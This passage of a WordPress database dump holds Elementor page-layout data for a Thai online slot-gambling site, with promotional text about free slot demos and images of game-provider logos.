\\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(732,104,'_thumbnail_id','61'),(735,105,'_elementor_edit_mode','builder'),(736,105,'_elementor_template_type','wp-page'),(737,105,'_elementor_version','3.32.5'),(738,105,'_elementor_pro_version','3.32.3'),(739,105,'_wp_page_template','default'),(740,105,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(741,105,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.web